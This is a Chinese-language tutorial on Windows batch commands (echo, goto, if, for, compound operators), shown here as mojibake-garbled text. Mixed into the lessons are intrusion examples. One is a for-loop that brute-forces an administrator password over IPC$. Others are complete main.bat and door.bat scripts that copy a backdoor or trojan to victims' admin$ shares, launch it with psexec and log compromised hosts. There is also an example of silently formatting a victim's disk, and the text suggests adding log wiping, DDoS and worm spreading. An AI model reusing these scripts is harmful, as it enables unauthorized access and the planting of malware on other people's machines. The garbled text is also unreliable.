Windows .bat èæ¬ç®åç¨æ³ä»ç»ï¼
ä¸.ç®åæ¹å¤çå
é¨å½ä»¤ç®ä»
1.Echo å½ä»¤
æå¼åæ¾æå
³é请æ±åæ¾åè½ï¼ææ¾ç¤ºæ¶æ¯ãå¦æ没æä»»ä½åæ°ï¼echo å½ä»¤å°æ¾ç¤ºå½ååæ¾è®¾ç½®ã
è¯æ³:
echo [{onâoff}] [message]
Sampleï¼@echo off / echo hello world
å¨å®é
åºç¨ä¸æ们ä¼æè¿æ¡å½ä»¤åéå®å符å·ï¼ä¹ç§°ä¸ºç®¡é符å·ï¼ä¸è¬ç¨> >> ^ï¼ç»åæ¥å®ç°è¾å
¥ä¸äºå½
令å°ç¹å®æ ¼å¼çæ件ä¸.è¿å°å¨ä»¥åçä¾åä¸ä½ç°åºæ¥ã
2.@ å½ä»¤
表示ä¸æ¾ç¤º@åé¢çå½ä»¤ï¼å¨å
¥ä¾µè¿ç¨ä¸ï¼ä¾å¦ä½¿ç¨æ¹å¤çæ¥æ ¼å¼åæ人ç硬çï¼èªç¶ä¸è½è®©å¯¹æ¹çå°ä½ 使
ç¨çå½ä»¤å¦ã
Sampleï¼@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format è¿ä¸ªå½ä»¤æ¯ä¸å¯ä»¥ä½¿ç¨/yè¿ä¸ªåæ°çï¼å¯åçæ¯å¾®è½¯çäºä¸ªautosetè¿
个åæ°ç»æ们ï¼ææå/yæ¯ä¸æ ·çã)
3.Goto å½ä»¤
æå®è·³è½¬å°æ ç¾ï¼æ¾å°æ ç¾åï¼ç¨åºå°å¤çä»ä¸ä¸è¡å¼å§çå½ä»¤ã
è¯æ³ï¼goto label ï¼labelæ¯åæ°ï¼æå®æè¦è½¬åçæ¹å¤çç¨åºä¸çè¡ãï¼
Sampleï¼
if {%1}=={} goto noparms
if {%2}=={} goto noparmsï¼å¦æè¿éçifã%1ã%2ä½ ä¸æç½çè¯ï¼å
è·³è¿å»ï¼åé¢ä¼æ详ç»ç解éãï¼
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
æ ç¾çååå¯ä»¥é便起ï¼ä½æ¯æ好æ¯ææä¹çåæ¯å¦ï¼åæ¯åå 个ï¼ç¨æ¥è¡¨ç¤ºè¿ä¸ªåæ¯æ¯æ ç¾ï¼gotoå½ä»¤
å°±æ¯æ ¹æ®è¿ä¸ªï¼æ¥å¯»æ¾ä¸ä¸æ¥è·³å°å°é£éãæ好æä¸äºè¯´æè¿æ ·ä½ å«äººçèµ·æ¥æä¼çè§£ä½ çæå¾åã
4.Rem å½ä»¤
注éå½ä»¤ï¼å¨Cè¯è¨ä¸ç¸å½ä¸/*--------*/,å®å¹¶ä¸ä¼è¢«æ§è¡ï¼åªæ¯èµ·ä¸ä¸ªæ³¨éçä½ç¨ï¼ä¾¿äºå«äººé
读åä½
èªå·±æ¥åä¿®æ¹ã
Rem Message
Sampleï¼@Rem Here is the description.
5.Pause å½ä»¤
è¿è¡ Pause å½ä»¤æ¶ï¼å°æ¾ç¤ºä¸é¢çæ¶æ¯ï¼
Press any key to continue . . .
Sampleï¼
@echo off
:begin
copy a:*.* dï¼\back
echo Please put a new disk into driver A
pause
goto begin
å¨è¿ä¸ªä¾åä¸ï¼é©±å¨å¨ A ä¸ç£çä¸çæææ件åå¤å¶å°d:\backä¸ãæ¾ç¤ºç注éæ示æ¨å°å¦ä¸å¼ ç£çæ¾å
¥
驱å¨å¨ A æ¶ï¼pause å½ä»¤ä¼ä½¿ç¨åºæèµ·ï¼ä»¥ä¾¿æ¨æ´æ¢ç£çï¼ç¶åæä»»æé®ç»§ç»å¤çã
6.Call å½ä»¤
ä»ä¸ä¸ªæ¹å¤çç¨åºè°ç¨å¦ä¸ä¸ªæ¹å¤çç¨åºï¼å¹¶ä¸ä¸ç»æ¢ç¶æ¹å¤çç¨åºãcall å½ä»¤æ¥åç¨ä½è°ç¨ç®æ çæ ç¾
ãå¦æå¨èæ¬ææ¹å¤çæ件å¤ä½¿ç¨ Callï¼å®å°ä¸ä¼å¨å½ä»¤è¡èµ·ä½ç¨ã
è¯æ³:
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
åæ°:
[Drive:}[Path] FileName
æå®è¦è°ç¨çæ¹å¤çç¨åºçä½ç½®åå称ãfilename åæ°å¿
é¡»å
·æ .bat æ .cmd æ©å±åã
7.start å½ä»¤
è°ç¨å¤é¨ç¨åºï¼ææçDOSå½ä»¤åå½ä»¤è¡ç¨åºé½å¯ä»¥ç±startå½ä»¤æ¥è°ç¨ã
常ç¨åæ°ï¼
MIN å¼å§æ¶çªå£æå°å
SEPARATE å¨åå¼ç空é´å
å¼å§ 16 ä½ Windows ç¨åº
HIGH å¨ HIGH ä¼å
级类å«å¼å§åºç¨ç¨åº
REALTIME å¨ REALTIME ä¼å
级类å«å¼å§åºç¨ç¨åº
WAIT å¯å¨åºç¨ç¨åºå¹¶çåå®ç»æ
parameters è¿äºä¸ºä¼ éå°å½ä»¤/ç¨åºçåæ°
æ§è¡çåºç¨ç¨åºæ¯ 32-ä½ GUI åºç¨ç¨åºæ¶ï¼CMD.EXEä¸çåºç¨ç¨åºç»æ¢å°±è¿åå½ä»¤æ示ãå¦æå¨å½ä»¤èæ¬
å
æ§è¡ï¼è¯¥æ°è¡ä¸ºåä¸ä¼åçã
8.choice å½ä»¤
choice 使ç¨æ¤å½ä»¤å¯ä»¥è®©ç¨æ·è¾å
¥ä¸ä¸ªå符ï¼ä»èè¿è¡ä¸åçå½ä»¤ã使ç¨æ¶åºè¯¥å /c:åæ°ï¼c:ååºåæ
示å¯è¾å
¥çå符ï¼ä¹é´æ ç©ºæ ¼ãå®çè¿åç 为1234......
å¦: choice /c:dme defrag,mem,end
å°æ¾ç¤º
defrag,mem,end[D,M,E]?
Sampleï¼
Sample.batçå
容å¦ä¸:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag ï¼åºå
å¤ææ°å¼æé«çé误ç ï¼
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
æ¤æ件è¿è¡åï¼å°æ¾ç¤º defrag,mem,end[D,M,E]? ç¨æ·å¯éæ©d m e ï¼ç¶åifè¯å¥å°ä½åºå¤æï¼d表示æ§è¡
æ å·ä¸ºdefragçç¨åºæ®µï¼m表示æ§è¡æ å·ä¸ºmemçç¨åºæ®µï¼e表示æ§è¡æ å·ä¸ºendçç¨åºæ®µï¼æ¯ä¸ªç¨åºæ®µæå
é½ä»¥goto endå°ç¨åºè·³å°endæ å·å¤ï¼ç¶åç¨åºå°æ¾ç¤ºgood byeï¼æ件ç»æã
9.If å½ä»¤
if 表示å°å¤ææ¯å¦ç¬¦åè§å®çæ¡ä»¶ï¼ä»èå³å®æ§è¡ä¸åçå½ä»¤ã
æä¸ç§æ ¼å¼:
1)ãif "åæ°" == "å符串" å¾
æ§è¡çå½ä»¤
åæ°å¦æçäºæå®çå符串ï¼åæ¡ä»¶æç«ï¼è¿è¡å½ä»¤ï¼å¦åè¿è¡ä¸ä¸å¥ã(注ææ¯ä¸¤ä¸ªçå·ï¼
å¦if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2)ãif exist æ件å å¾
æ§è¡çå½ä»¤
å¦æææå®çæ件ï¼åæ¡ä»¶æç«ï¼è¿è¡å½ä»¤ï¼å¦åè¿è¡ä¸ä¸å¥ã
å¦if exist config.sys edit config.sys
3)ãif errorlevel / if not errorlevel æ°å å¾
æ§è¡çå½ä»¤
å¦æè¿åç çäºæå®çæ°åï¼åæ¡ä»¶æç«ï¼è¿è¡å½ä»¤ï¼å¦åè¿è¡ä¸ä¸å¥ã
å¦if errorlevel 2 goto x2
DOSç¨åºè¿è¡æ¶é½ä¼è¿åä¸ä¸ªæ°åç»DOSï¼ç§°ä¸ºé误ç errorlevelæ称è¿åç ï¼å¸¸è§çè¿åç 为0ã1ã
10.for å½ä»¤
for å½ä»¤æ¯ä¸ä¸ªæ¯è¾å¤æçå½ä»¤ï¼ä¸»è¦ç¨äºåæ°å¨æå®çèå´å
循ç¯æ§è¡å½ä»¤ã
å¨æ¹å¤çæ件ä¸ä½¿ç¨ FOR å½ä»¤æ¶ï¼æå®åéè¯·ä½¿ç¨ %%variable
for {%variableâ%%variable} in (set) do command [ CommandLineOptions]
%variable æå®ä¸ä¸ªåä¸åæ¯å¯æ¿æ¢çåæ°ã
(set) æå®ä¸ä¸ªæä¸ç»æ件ãå¯ä»¥ä½¿ç¨éé
符ã
command æå®å¯¹æ¯ä¸ªæ件æ§è¡çå½ä»¤ã
command-parameters 为ç¹å®å½ä»¤æå®åæ°æå½ä»¤è¡å¼å
³ã
å¨æ¹å¤çæ件ä¸ä½¿ç¨ FOR å½ä»¤æ¶ï¼æå®åéè¯·ä½¿ç¨ %%variable
èä¸è¦ç¨ %variableãåéå称æ¯åºå大å°åçï¼æ以 %i ä¸åäº %I
å¦æå½ä»¤æ©å±å被å¯ç¨ï¼ä¸åé¢å¤ç FOR å½ä»¤æ ¼å¼ä¼åå°æ¯æ:
FOR /D %variable IN (set) DO command [command-parameters]
å¦æéä¸å
å«éé
符ï¼åæå®ä¸ç®å½åå¹é
ï¼èä¸ä¸æ件åå¹é
ã
FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]
æ£æ¥ä»¥ [drive:]path ä¸ºæ ¹çç®å½æ ï¼æåæ¯ä¸ªç®å½ä¸çFOR è¯å¥ãå¦æå¨ /R å没ææå®ç®å½ï¼å使ç¨
å½åç®å½ãå¦æéä»
为ä¸ä¸ªåç¹(.)å符ï¼åæ举该ç®å½æ ã
FOR /L %variable IN (start,step,end) DO command [command-parameters]
该é表示以å¢éå½¢å¼ä»å¼å§å°ç»æçä¸ä¸ªæ°ååºåã
å æ¤ï¼(1,1,5) å°äº§çåºå 1 2 3 4 5ï¼(5,-1,1) å°äº§ç
åºå (5 4 3 2 1)ã
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
æè
ï¼å¦ææ usebackq é项:
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
filenameset 为ä¸ä¸ªæå¤ä¸ªæ件åã继ç»å° filenameset ä¸çä¸ä¸ä¸ªæ件ä¹åï¼æ¯ä»½æ件é½å·²è¢«æå¼ã读
å并ç»è¿å¤çã
å¤çå
æ¬è¯»åæ件ï¼å°å
¶åæä¸è¡è¡çæåï¼ç¶åå°æ¯è¡è§£ææé¶ææ´å¤ç符å·ãç¶åç¨å·²æ¾å°ç符å·å
符串åéå¼è°ç¨ For 循ç¯ã以é»è®¤æ¹å¼ï¼/F éè¿æ¯ä¸ªæ件çæ¯ä¸è¡ä¸åå¼ç第ä¸ä¸ªç©ºç½ç¬¦å·ãè·³è¿ç©ºç½
è¡ãæ¨å¯éè¿æå®å¯é "options" åæ°æ¿ä»£é»è®¤è§£ææä½ãè¿ä¸ªå¸¦å¼å·çå符串å
æ¬ä¸ä¸ªæå¤ä¸ªæå®ä¸å
解æé项çå
³é®åãè¿äºå
³é®å为:
eol=c - æä¸ä¸ªè¡æ³¨éå符çç»å°¾(å°±ä¸ä¸ª)
skip=n - æå¨æ件å¼å§æ¶å¿½ç¥çè¡æ°ã
delims=xxx - æåé符éãè¿ä¸ªæ¿æ¢äºç©ºæ ¼åè·³æ ¼é®çé»è®¤åé符éã
tokens=x,y,m-n - ææ¯è¡çåªä¸ä¸ªç¬¦å·è¢«ä¼ éå°æ¯ä¸ªè¿ä»£ç for æ¬èº«ãè¿ä¼å¯¼è´é¢å¤åéå称ç
æ ¼å¼ä¸ºä¸ä¸ªèå´ãéè¿ nth 符å·æå® m 符å·å符串ä¸çæåä¸ä¸ªå符æå·ï¼é£ä¹é¢å¤çåéå°å¨æåä¸
个符å·è§£æä¹åé
并æ¥åè¡çä¿çææ¬ã
usebackq - æå®æ°è¯æ³å·²å¨ä¸ç±»æ
åµä¸ä½¿ç¨:
å¨ä½ä¸ºå½ä»¤æ§è¡ä¸ä¸ªåå¼å·çå符串并ä¸å¼å·å符为æåå符串å½ä»¤å¹¶å
è®¸å¨ file-setä¸ä½¿ç¨åå¼å·æ©èµ·
æ件å称ã
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
ä¼åæ myfile.txt ä¸çæ¯ä¸è¡ï¼å¿½ç¥ä»¥åå·æ头çé£äºè¡ï¼å°æ¯è¡ä¸ç第äºä¸ªå第ä¸ä¸ªç¬¦å·ä¼ éç» for
ç¨åºä½ï¼ç¨éå·å/æ ç©ºæ ¼å®ç符å·ã请注æï¼è¿ä¸ª for ç¨åºä½çè¯å¥å¼ç¨ %i æ¥åå¾ç¬¬äºä¸ªç¬¦å·ï¼å¼ç¨
%j æ¥åå¾ç¬¬ä¸ä¸ªç¬¦å·ï¼å¼ç¨ %kæ¥åå¾ç¬¬ä¸ä¸ªç¬¦å·åçææå©ä½ç¬¦å·ã对äºå¸¦æç©ºæ ¼çæ件åï¼æ¨éè¦ç¨
åå¼å·å°æ件åæ¬èµ·æ¥ã为äºç¨è¿ç§æ¹å¼æ¥ä½¿ç¨åå¼å·ï¼æ¨è¿éè¦ä½¿ç¨ usebackq é项ï¼å¦åï¼åå¼å·ä¼
被ç解ææ¯ç¨ä½å®ä¹æ个è¦åæçå符串çã
%i ä¸é¨å¨ for è¯å¥ä¸å¾å°è¯´æï¼%j å %k æ¯éè¿tokens= é项ä¸é¨å¾å°è¯´æçãæ¨å¯ä»¥éè¿ tokens=
ä¸è¡æå®æå¤ 26 个符å·ï¼åªè¦ä¸è¯å¾è¯´æä¸ä¸ªé«äºåæ¯ 'z' æ'Z' çåéã请记ä½ï¼FOR åéæ¯åä¸å
æ¯ãå大å°ååå
¨å±çï¼åæ¶ä¸è½æ 52 个以ä¸é½å¨ä½¿ç¨ä¸ã
æ¨è¿å¯ä»¥å¨ç¸é»å符串ä¸ä½¿ç¨ FOR /F åæé»è¾ï¼æ¹æ³æ¯ï¼ç¨åå¼å·å°æ¬å·ä¹é´ç filenameset æ¬èµ·æ¥ã
è¿æ ·ï¼è¯¥å符串ä¼è¢«å½ä½ä¸ä¸ªæ件ä¸çä¸ä¸ªåä¸è¾å
¥è¡ã
æåï¼æ¨å¯ä»¥ç¨ FOR /F å½ä»¤æ¥åæå½ä»¤çè¾åºãæ¹æ³æ¯ï¼å°æ¬å·ä¹é´ç filenameset åæä¸ä¸ªåæ¬å符
串ã该å符串ä¼è¢«å½ä½å½ä»¤è¡ï¼ä¼ éå°ä¸ä¸ªå CMD.EXEï¼å
¶è¾åºä¼è¢«æè¿å
åï¼å¹¶è¢«å½ä½æ件åæãå æ¤
ï¼ä»¥ä¸ä¾å:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
ä¼æ举å½åç¯å¢ä¸çç¯å¢åéå称ã
å¦å¤ï¼FOR åéåç
§çæ¿æ¢å·²è¢«å¢å¼ºãæ¨ç°å¨å¯ä»¥ä½¿ç¨ä¸åé项è¯æ³:
~I - å é¤ä»»ä½å¼å·(")ï¼æ©å
%I
%~fI - å° %I æ©å
å°ä¸ä¸ªå®å
¨åæ ¼çè·¯å¾å
%~dI - ä»
å° %I æ©å
å°ä¸ä¸ªé©±å¨å¨å·
%~pI - ä»
å° %I æ©å
å°ä¸ä¸ªè·¯å¾
%~nI - ä»
å° %I æ©å
å°ä¸ä¸ªæ件å
%~xI - ä»
å° %I æ©å
å°ä¸ä¸ªæ件æ©å±å
%~sI - æ©å
çè·¯å¾åªå«æçå
%~aI - å° %I æ©å
å°æ件çæ件å±æ§
%~tI - å° %I æ©å
å°æ件çæ¥æ/æ¶é´
%~zI - å° %I æ©å
å°æ件ç大å°
%~$PATH:I - æ¥æ¾åå¨è·¯å¾ç¯å¢åéçç®å½ï¼å¹¶å° %I æ©å
å°æ¾å°ç第ä¸ä¸ªå®å
¨åæ ¼çå称ãå¦æç¯å¢å
éæªè¢«å®ä¹ï¼æè
没ææ¾å°æ件ï¼æ¤ç»åé®ä¼æ©å
空å符串
å¯ä»¥ç»å修饰符æ¥å¾å°å¤éç»æ:
%~dpI - ä»
å° %I æ©å
å°ä¸ä¸ªé©±å¨å¨å·åè·¯å¾
%~nxI - ä»
å° %I æ©å
å°ä¸ä¸ªæ件ååæ©å±å
%~fsI - ä»
å° %I æ©å
å°ä¸ä¸ªå¸¦æçåçå®æ´è·¯å¾å
%~dp$PATH:i - æ¥æ¾åå¨è·¯å¾ç¯å¢åéçç®å½ï¼å¹¶å° %I æ©å
å°æ¾å°ç第ä¸ä¸ªé©±å¨å¨å·åè·¯å¾ã
%~ftzaI - å° %I æ©å
å°ç±»ä¼¼è¾åºçº¿è·¯ç DIR
å¨ä»¥ä¸ä¾åä¸ï¼%I å PATH å¯ç¨å
¶ä»æææ°å¼ä»£æ¿ã%~ è¯æ³ç¨ä¸ä¸ªææç FOR åéåç»æ¢ãéå类似
%I ç大ååéåæ¯è¾æ读ï¼èä¸é¿å
ä¸ä¸å大å°åçç»åé®æ··æ·ã
以ä¸æ¯MSçå®æ¹å¸®å©ï¼ä¸é¢æ们举å 个ä¾åæ¥å
·ä½è¯´æä¸ä¸Forå½ä»¤å¨å
¥ä¾µä¸çç¨éã
sample2ï¼
å©ç¨Forå½ä»¤æ¥å®ç°å¯¹ä¸å°ç®æ Win2k主æºçæ´åå¯ç ç ´è§£ã
æ们ç¨net use file://ip/ipc$ "password" /u:"administrator"æ¥å°è¯è¿åç®æ 主æºè¿è¡è¿æ¥ï¼å½æåæ¶è®°ä¸
å¯ç ã
æ主è¦çå½ä»¤æ¯ä¸æ¡ï¼for /f i% in (dict.txt) do net use file://ip/ipc$ "i%" /u:"administrator"
ç¨i%æ¥è¡¨ç¤ºadminçå¯ç ï¼å¨dict.txtä¸è¿ä¸ªåi%çå¼ç¨net use å½ä»¤æ¥è¿æ¥ãç¶åå°ç¨åºè¿è¡ç»æä¼ éç»
findå½ä»¤ï¼ï¼
for /f i%% in (dict.txt) do net use file://ip/ipc$ "i%%" /u:"administrator"âfind ":å½ä»¤æåå®
æ">>D:\ok.txt ï¼è¿æ ·å°±koäºã
sample3ï¼
ä½ æ没æè¿æéæ大éè鸡ççä½ å»ç§åé¨ï¼æ¨é©¬å¢ï¼ï¼å½æ°éç¹å«å¤çæ¶åï¼åæ¬å¾å¼å¿çä¸ä»¶äºé½ä¼
åå¾å¾éé·ï¼ï¼ãæç« å¼å¤´å°±è°å°ä½¿ç¨æ¹å¤çæ件ï¼å¯ä»¥ç®åæ¥å¸¸æéå¤æ§ä»»å¡ãé£ä¹å¦ä½å®ç°å¢ï¼åµåµ
ï¼çä¸å»ä½ å°±ä¼æç½äºã
主è¦å½ä»¤ä¹åªæä¸æ¡ï¼ï¼å¨æ¹å¤çæ件ä¸ä½¿ç¨ FOR å½ä»¤æ¶ï¼æå®åéä½¿ç¨ %%variableï¼
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokensçç¨æ³è¯·åè§ä¸é¢çsample1ï¼å¨è¿éå®è¡¨ç¤ºæ顺åºå°victim.txtä¸çå
å®¹ä¼ éç»door.batä¸çåæ°
%i %j %kã
ècultivate.batæ éå°±æ¯ç¨net useå½ä»¤æ¥å»ºç«IPC$è¿æ¥ï¼å¹¶copyæ¨é©¬ï¼åé¨å°victimï¼ç¶åç¨è¿åç
ï¼If errorlever =ï¼æ¥çéæåç§æ¤åé¨ç主æºï¼å¹¶echoåºæ¥ï¼æè
echoå°æå®çæ件ã
delims= 表示vivtim.txtä¸çå
容æ¯ä¸ç©ºæ ¼æ¥åéçãææ³çå°è¿éä½ ä¹ä¸å®æç½è¿victim.txtéçå
容
æ¯ä»ä¹æ ·çäºãåºè¯¥æ ¹æ®%%i %%j %%k表示ç对象æ¥æåï¼ä¸è¬å°±æ¯ ip password usernameã
代ç éå½¢ï¼
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
------------------- cut here then save as a batchfile(I call it door.bat) ------------------
-----------
@net use file://%1/ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3
>>ko.txt
@psexec file://%1/ c:\winnt\system32\windrv32.exe
@psexec file://%1/ net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------
------------
è¿åªæ¯ä¸ä¸ªèªå¨ç§æ¤åé¨æ¹å¤ççéå½¢ï¼ä¸¤ä¸ªæ¹å¤çååé¨ç¨åºï¼Windrv32.exeï¼,PSexec.exeéæ¾å¨ç»ä¸
ç®å½ä¸.æ¹å¤çå
容
å°å¯æ©å±,ä¾å¦:å å
¥æ¸
é¤æ¥å¿+DDOSçåè½,å å
¥å®æ¶æ·»å ç¨æ·çåè½,æ´æ·±å
¥ä¸ç¹å¯ä»¥ä½¿ä¹å
·å¤èªå¨ä¼ æå
è½(è è«).æ¤å¤ä¸å¤ååè¿°,æå
´è¶£çæåå¯èªè¡ç 究.
äº.å¦ä½å¨æ¹å¤çæ件ä¸ä½¿ç¨åæ°
æ¹å¤çä¸å¯ä»¥ä½¿ç¨åæ°ï¼ä¸è¬ä»1%å° 9%è¿ä¹ä¸ªï¼å½æå¤ä¸ªåæ°æ¶éè¦ç¨shiftæ¥ç§»å¨ï¼è¿ç§æ
åµå¹¶ä¸å¤è§
ï¼æ们就ä¸èèå®äºã
sample1ï¼fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
è¿ä¸ªä¾åç¨äºè¿ç»å°æ ¼å¼åå å¼ è½¯çï¼æ以ç¨çæ¶åéå¨dosçªå£è¾å
¥fomat.bat aï¼åµåµ,好åæç¹ç»èæ·»
足äºï½
sample2ï¼
å½æ们è¦å»ºç«ä¸ä¸ªIPC$è¿æ¥å°æ¶åæ»è¦è¾å
¥ä¸å¤§ä¸²å½ä»¤ï¼å¼ä¸å¥½å°±æéäºï¼æ以æ们ä¸å¦æä¸äºåºå®å½ä»¤
åå
¥ä¸ä¸ªæ¹å¤çï¼æè鸡å°ip password username å½çåæ°æ¥èµç»è¿ä¸ªæ¹å¤çï¼è¿æ ·å°±ä¸ç¨æ¯æ¬¡é½æå½ä»¤
äºã
@echo off
@net use file://1%/ipc$ "2%" /u:"3%" 注æå¦ï¼è¿éPASSWORDæ¯ç¬¬äºä¸ªåæ°ã
@if errorlevel 1 echo connection failed
æä¹æ ·,使ç¨åæ°è¿æ¯æ¯è¾ç®åçå§ï¼ä½ è¿ä¹å¸
ä¸å®å¦ä¼äº.No.3
ä¸.å¦ä½ä½¿ç¨ç»åå½ä»¤(Compound Command)
1.&
Usageï¼ç¬¬ä¸æ¡å½ä»¤ & 第äºæ¡å½ä»¤ [& 第ä¸æ¡å½ä»¤...]
ç¨è¿ç§æ¹æ³å¯ä»¥åæ¶æ§è¡å¤æ¡å½ä»¤ï¼èä¸ç®¡å½ä»¤æ¯å¦æ§è¡æå
Sampleï¼
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usageï¼ç¬¬ä¸æ¡å½ä»¤ && 第äºæ¡å½ä»¤ [&& 第ä¸æ¡å½ä»¤...]
ç¨è¿ç§æ¹æ³å¯ä»¥åæ¶æ§è¡å¤æ¡å½ä»¤ï¼å½ç¢°å°æ§è¡åºéçå½ä»¤åå°ä¸æ§è¡åé¢çå½ä»¤ï¼å¦æä¸ç´æ²¡æåºéå
ä¸ç´æ§è¡å®ææå½ä»¤ï¼
Sampleï¼
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
å¨åå¤ä»½çæ¶åå¯è½ä¼ç¨å°è¿ç§å½ä»¤ä¼æ¯è¾ç®åï¼å¦ï¼
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb
E:\backup
å¦æè¿ç¨æå¡å¨ä¸åå¨backup.mdbæ件ï¼å°±æ§è¡copyå½ä»¤ï¼è¥ä¸åå¨è¯¥æ件åä¸æ§è¡copyå½ä»¤ãè¿ç§ç¨æ³
å¯ä»¥æ¿æ¢IF existäº.
3.ââ
Usageï¼ç¬¬ä¸æ¡å½ä»¤ ââ 第äºæ¡å½ä»¤ [ââ 第ä¸æ¡å½ä»¤...]
ç¨è¿ç§æ¹æ³å¯ä»¥åæ¶æ§è¡å¤æ¡å½ä»¤ï¼å½ç¢°å°æ§è¡æ£ç¡®çå½ä»¤åå°ä¸æ§è¡åé¢çå½ä»¤ï¼å¦æ没æåºç°æ£ç¡®ç
å½ä»¤åä¸ç´æ§è¡å®ææå½ä»¤ï¼
Sampleï¼
C:\Ex4rch>dir sometips.gif ââ del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
ç»åå½ä»¤ä½¿ç¨çä¾åï¼
sampleï¼
@copy trojan.exe file://%1/admin$/system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3
>>victim.txt
追é®å¤å¶ç²è´´å¾æææï¼ï¼